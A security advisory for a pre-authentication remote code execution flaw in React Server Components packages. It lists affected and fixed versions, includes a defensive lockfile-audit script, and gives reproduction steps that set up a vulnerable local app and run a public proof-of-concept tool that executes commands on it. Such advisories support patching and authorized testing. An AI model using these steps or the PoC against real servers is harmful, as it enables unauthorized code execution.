# CVE-2025-55182

## Summary

Pre-authentication RCE in React Server Components (react-server-dom-* 19.0.0–19.2.0) via unsafe deserialization of Server Function requests.

## Description

### Summary
A pre-authentication remote code execution vulnerability affects React Server Components packages `react-server-dom-webpack`, `react-server-dom-parcel`, and `react-server-dom-turbopack` in versions 19.0.0, 19.1.0–19.1.1, and 19.2.0. The server-side decoding of React Server Function requests unsafely deserializes attacker-controlled payloads, allowing an unauthenticated attacker to craft a malicious HTTP request and achieve arbitrary code execution.

### Details
React Server Components use the Flight protocol to carry client-side Server Function calls as HTTP requests to Server Function endpoints. The vulnerable code path deserializes the attacker-controlled `multipart/form-data` body of such a request without sufficient validation, enabling prototype-chain manipulation that can reach the `Function` constructor (e.g., via crafted references such as `$1:__proto__:then` and `$1:constructor:constructor`). A single unauthenticated POST request carrying a `Next-Action` header can therefore trigger RCE on the server. Applications are affected when they use React Server Components through a framework or bundler (e.g., Next.js App Router) and one of these packages is present.

**Fixed versions:** 19.0.1, 19.1.2, and 19.2.1 (or later) of the affected packages.
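As an added example (not part of this advisory or of the React project), the script below audits a `package-lock.json` for the affected `react-server-dom-*` versions listed above and names the fixed release for each hit; the lockfile fragment it walks is constructed for the demonstration.

```javascript
// Added example, not from the advisory: audit an npm lockfile for the
// react-server-dom-* versions listed above and name the fixed release.
const AFFECTED_PACKAGES = [
  'react-server-dom-webpack',
  'react-server-dom-parcel',
  'react-server-dom-turbopack',
];

// Affected versions from the advisory, each mapped to its fixed release.
const AFFECTED_TO_FIXED = {
  '19.0.0': '19.0.1',
  '19.1.0': '19.1.2',
  '19.1.1': '19.1.2',
  '19.2.0': '19.2.1',
};

// Drop a leading "v"/"=" and any prerelease/build suffix (advisory lists releases only).
function normalizeVersion(version) {
  return String(version).replace(/^[=v]/, '').split(/[-+]/)[0];
}

// Returns the fixed version when (name, version) is affected, otherwise null.
function fixedVersionFor(name, version) {
  if (!AFFECTED_PACKAGES.includes(name)) return null;
  return AFFECTED_TO_FIXED[normalizeVersion(version)] || null;
}

// Walks the "packages" map of a lockfileVersion 2/3 package-lock.json, whose keys
// are install paths such as "node_modules/react-server-dom-webpack" (nested copies
// under another package's node_modules count too); one finding per affected install.
function auditLockfile(lock) {
  const findings = [];
  for (const [installPath, entry] of Object.entries(lock.packages || {})) {
    const name = entry.name || installPath.split('node_modules/').pop();
    if (!name || !entry.version) continue;
    const fixed = fixedVersionFor(name, entry.version);
    if (fixed) findings.push({ path: installPath, name, version: entry.version, fixed });
  }
  return findings;
}

// Constructed sample lockfile fragment (hypothetical project, not real data).
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'rsc-vuln', version: '0.1.0' },
    'node_modules/react': { version: '19.2.0' },
    'node_modules/react-server-dom-webpack': { version: '19.2.0' },
    'node_modules/next/node_modules/react-server-dom-turbopack': { version: '19.2.1' },
  },
};
```

To run it against a real project, replace `SAMPLE_LOCK` with `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))` and print `auditLockfile(...)`.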

### Reproduction Steps (authorized testing only)
**Environment:** Node.js 20+, npm, Python 3, a vulnerable RSC-enabled app (example: Next.js App Router). The steps below create a local vulnerable target and use a public PoC to verify exploitation.

1) **Create a vulnerable Next.js app**
```bash
npx create-next-app@15.4.0 rsc-vuln
cd rsc-vuln
npm install react@19.2.0 react-dom@19.2.0 react-server-dom-webpack@19.2.0
```

2) **Add a simple Server Action to ensure a Server Function endpoint exists**
`app/actions.ts`:
```ts
'use server';
export async function ping() {
  return 'ok';
}
```
`app/page.tsx`:
```tsx
import { ping } from './actions';
export default function Page() {
  return (
    <form action={ping}>
      <button type="submit">Ping</button>
    </form>
  );
}
```

3) **Run the vulnerable app**
```bash
npm run dev
```
(Leave it running on `http://localhost:3000`.)

4) **Clone and install the PoC tool**
```bash
git clone https://github.com/rvzsec/react2shell
cd react2shell
pip3 install -r requirements.txt
```

5) **Check and exploit**
```bash
python3 react2shell.py check -t http://localhost:3000
python3 react2shell.py exec  -t http://localhost:3000 -c "id"
```

### Indicators of Success
- The PoC reports the target as vulnerable.
- The `exec` command returns output such as the server process user (`uid=`/`gid=`), confirming code execution.

### Notes
- If your application does not use React Server Components or does not run server-side React code, it is not affected.
- Upgrade to patched versions immediately: 19.0.1, 19.1.2, or 19.2.1+.


## Metadata

- Product: npm:react-server-dom-webpack
- Severity: critical
- Status: open
